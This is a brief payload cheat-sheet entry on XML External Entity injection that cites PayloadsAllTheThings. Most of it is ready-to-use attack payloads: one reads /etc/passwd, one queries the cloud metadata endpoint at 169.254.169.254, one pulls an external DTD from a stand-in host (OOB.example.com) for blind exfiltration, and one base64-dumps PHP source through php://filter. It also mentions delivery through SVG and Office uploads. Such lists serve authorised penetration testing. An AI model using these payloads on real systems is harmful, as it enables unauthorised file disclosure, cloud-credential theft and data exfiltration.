XML External Entity
Classic file read via inline entity; blind exfiltration via an external DTD you host. Also works through SVG and Office (docx/xlsx) uploads. Avoid billion-laughs on prod - it's a DoS.
Tags: xxe, xml, file-read, oob, ssrf
Controlled probes
<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r><!DOCTYPE r [<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/">]><r>&x;</r><!DOCTYPE r [<!ENTITY % ext SYSTEM "http://OOB.example.com/evil.dtd"> %ext;]><?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><r>&x;</r><svg xmlns="http://www.w3.org/2000/svg"><!DOCTYPE ...> (upload as .svg)
Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection